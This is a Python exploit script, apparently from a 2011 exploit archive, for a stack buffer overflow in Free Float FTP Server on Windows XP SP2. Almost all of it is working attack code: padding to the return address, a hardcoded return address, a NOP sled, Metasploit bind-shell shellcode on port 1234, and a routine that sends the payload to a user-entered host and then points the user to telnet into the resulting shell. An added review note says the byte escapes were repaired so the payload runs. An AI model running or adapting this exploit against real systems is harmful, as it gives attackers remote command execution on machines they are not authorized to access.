
Free Float FTP Server Buffer Overflow

Posted on 21 August 2011

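#!/usr/bin/python
"""Free Float FTP Server response stack buffer overflow exploit.

Tested on: Windows XP SP2.
Author: Debasish Mandal
URL: http://www.facebook.com/raza.whitehat

Only run this against a host you are authorized to test: a failed attempt
(wrong offset or return address) crashes the FTP service.

NOTE(review): the listing as published had the backslash stripped from every
``\\x`` escape (``"x90"``, ``"xbd..."``), which turned the NOP sled and the
shellcode into plain ASCII text.  The escapes are restored here as ``bytes``
literals so the payload is the intended raw bytes on both Python 2 and 3.
"""
from __future__ import print_function

import socket
import sys
from struct import pack

__all__ = ["BAD_CHARS", "SHELLCODE", "build_payload", "send_payload", "main"]

try:  # Python 2: raw_input() returns the line unevaluated
    _read_line = raw_input
except NameError:  # Python 3
    _read_line = input

# Bytes the original author lists as bad characters for this target.  NUL
# ends a C string and CR/LF end an FTP command line, so any of them in the
# payload truncates it before the overflow is reached.
BAD_CHARS = b"\x00\x0a\x0d"

# Padding up to the saved return address, as measured by the original author.
OFFSET_TO_EIP = 251
# Fixed return address from the original exploit.  It is only valid for the
# XP SP2 build it was tested on (no ASLR there); retarget for anything else.
RET_ADDR = 0x77F5801C
NOP_SLED = b"\x90" * 20
# The original appends five more bytes after the shellcode.
TRAILING_JUNK = b"A" * 5

# Shellcode generated by the Metasploit framework:
#   windows/shell/bind_tcp, LPORT=1234, bad characters \x00\x0a\x0d.
SHELLCODE = (
    b"\xbd\xe6\x09\xc6\x4f\xd9\xc4\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
    b"\x4b\x83\xc2\x04\x31\x6a\x10\x03\x6a\x10\x04\xfc\x3a\xa7\x41"
    b"\xff\xc2\x38\x31\x89\x26\x09\x63\xed\x23\x38\xb3\x65\x61\xb1"
    b"\x38\x2b\x92\x42\x4c\xe4\x95\xe3\xfa\xd2\x98\xf4\xcb\xda\x77"
    b"\x36\x4a\xa7\x85\x6b\xac\x96\x45\x7e\xad\xdf\xb8\x71\xff\x88"
    b"\xb7\x20\xef\xbd\x8a\xf8\x0e\x12\x81\x41\x68\x17\x56\x35\xc2"
    b"\x16\x87\xe6\x59\x50\x3f\x8c\x05\x41\x3e\x41\x56\xbd\x09\xee"
    b"\xac\x35\x88\x26\xfd\xb6\xba\x06\x51\x89\x72\x8b\xa8\xcd\xb5"
    b"\x74\xdf\x25\xc6\x09\xe7\xfd\xb4\xd5\x62\xe0\x1f\x9d\xd4\xc0"
    b"\x9e\x72\x82\x83\xad\x3f\xc1\xcc\xb1\xbe\x06\x67\xcd\x4b\xa9"
    b"\xa8\x47\x0f\x8d\x6c\x03\xcb\xac\x35\xe9\xba\xd1\x26\x55\x62"
    b"\x77\x2c\x74\x77\x01\x6f\x11\xb4\x3f\x90\xe1\xd2\x48\xe3\xd3"
    b"\x7d\xe2\x6b\x58\xf5\x2c\x6b\x9f\x2c\x88\xe3\x5e\xcf\xe8\x2a"
    b"\xa5\x9b\xb8\x44\x0c\xa4\x53\x95\xb1\x71\xf3\xc5\x1d\x2a\xb3"
    b"\xb5\xdd\x9a\x5b\xdc\xd1\xc5\x7b\xdf\x3b\x6e\x4a\xfb\x97\xf9"
    b"\xae\xfb\x13\x28\x27\x1d\x71\xdc\x61\xb5\xee\x1e\x56\x0e\x88"
    b"\x61\xbd\x22\x01\xf6\x8a\x2c\x95\xf9\x0b\x7b\xb5\x56\xa4\xec"
    b"\x4e\xb5\x71\x0c\x51\x90\xd2\x59\xc6\x6e\xb2\x28\x76\x6e\x9f"
    b"\xd9\x78\xfa\x1b\x48\x2e\x92\x21\xad\x18\x3d\xda\x98\x12\xf4"
    b"\x4e\x63\x4d\xf9\x9e\x63\x8d\xaf\xf4\x63\xe5\x17\xac\x37\x10"
    b"\x58\x79\x24\x89\xcd\x81\x1d\x7d\x45\xe9\xa3\x58\xa1\xb6\x5c"
    b"\x8f\x33\x8b\x8a\xf6\xb1\xfd\xb8\x1a\x7a"
)


def build_payload(offset=OFFSET_TO_EIP, ret_addr=RET_ADDR, nop_sled=NOP_SLED,
                  shellcode=SHELLCODE, junk=TRAILING_JUNK):
    """Assemble the overflow buffer: padding | ret addr | NOP sled | shellcode | junk.

    Args:
        offset: number of filler bytes before the saved return address.
        ret_addr: 32-bit address packed little-endian into the return slot.
        nop_sled: bytes placed between the return address and the shellcode.
        shellcode: raw shellcode bytes.
        junk: bytes appended after the shellcode.

    Returns:
        The payload as ``bytes``.

    Raises:
        ValueError: if any byte in BAD_CHARS appears in the payload, since the
            server would truncate the command before the overflow triggers.
        struct.error: if ``ret_addr`` does not fit in 32 bits.
    """
    payload = b"A" * offset + pack("<L", ret_addr) + nop_sled + shellcode + junk
    # bytearray() yields ints on both Python 2 and 3, so the comparison is
    # version-independent.
    found = sorted(set(bytearray(payload)) & set(bytearray(BAD_CHARS)))
    if found:
        raise ValueError("payload contains bad characters: %s"
                         % ", ".join("0x%02x" % b for b in found))
    return payload


def send_payload(host, port, payload, timeout=10.0):
    """Connect to ``host:port``, read the banner and send ``payload``.

    The original sends the buffer followed by a single space and no CRLF;
    that is kept as-is.  ``sendall`` is used so a partial write cannot leave
    the return address unsent.

    Raises:
        socket.error (incl. socket.timeout) on connect/recv/send failure.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Without a timeout a filtered port or a wedged server hangs the script.
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
        print("[*]Connected to target FTP Server!")
        sock.recv(1024)  # consume the welcome banner
        print("[*]Sending PAYLOAD to the target server")
        sock.sendall(payload + b" ")
    finally:
        sock.close()


def main():
    """Prompt for the target, build the payload and send it."""
    host = _read_line("Enter the target host : ").strip()
    port_text = _read_line("Enter the targer port (Default 21): ").strip()
    # The prompt advertises a default, but the original int() call on an
    # empty answer raised ValueError; honour the default instead.
    port = int(port_text) if port_text else 21
    print("[*] Connecting to the host " + host + " on port " + str(port))
    try:
        send_payload(host, port, build_payload())
    except socket.error as exc:
        # Report the reason (the original bare except hid it) and exit
        # non-zero so a wrapper script can tell failure from success.
        print("[*] FTP Server didn't respond (%s)" % exc)
        sys.exit(1)
    print("[*]Exploit Completed...")
    print("[*]Now telnet to the server on port 1234")


if __name__ == "__main__":
    main()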

 
